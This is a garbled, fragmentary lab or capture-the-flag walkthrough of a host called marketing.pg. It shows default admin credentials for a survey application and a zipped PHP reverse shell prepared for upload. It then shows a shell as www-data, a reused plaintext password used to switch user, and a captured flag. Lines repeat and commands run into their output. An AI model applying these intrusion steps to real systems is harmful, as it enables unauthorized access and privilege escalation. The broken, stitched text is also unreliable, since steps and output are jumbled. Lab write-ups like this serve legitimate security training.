Foothold
view-source:http://marketing.pg/old/index.htm
192.168.246.225 marketing.pg customers-survey.marketing.pghttp://customers-survey.marketing.pg/
Last updated
view-source:http://marketing.pg/old/index.htm192.168.246.225 marketing.pg customers-survey.marketing.pghttp://customers-survey.marketing.pg/Last updated
/index.php/admin/authentication/sa/loginadmin:password❯ zip pwned.zip php-rev.php config.xml
adding: php-rev.php (deflated 61%)
adding: config.xml (deflated 56%)...
filehandle = open("pwned.zip",mode = "rb") # CHANGE THIS
...www-data@marketing:/home$ ss -anp | grep 127.0.0.1
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*EzPwz2022_dev1$$23!!www-data@marketing:/dev/shm$ su t.miller
Password:
t.miller@marketing:/dev/shm$ whoami && cat /home/t.miller/local.txt && ip a
t.miller
04b43e167182973c50855569b9babbd9
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:bf:d0:d1 brd ff:ff:ff:ff:ff:ff
inet 192.168.177.225/24 brd 192.168.177.255 scope global ens160
valid_lft forever preferred_lft forever
t.miller@marketing:/dev/shm$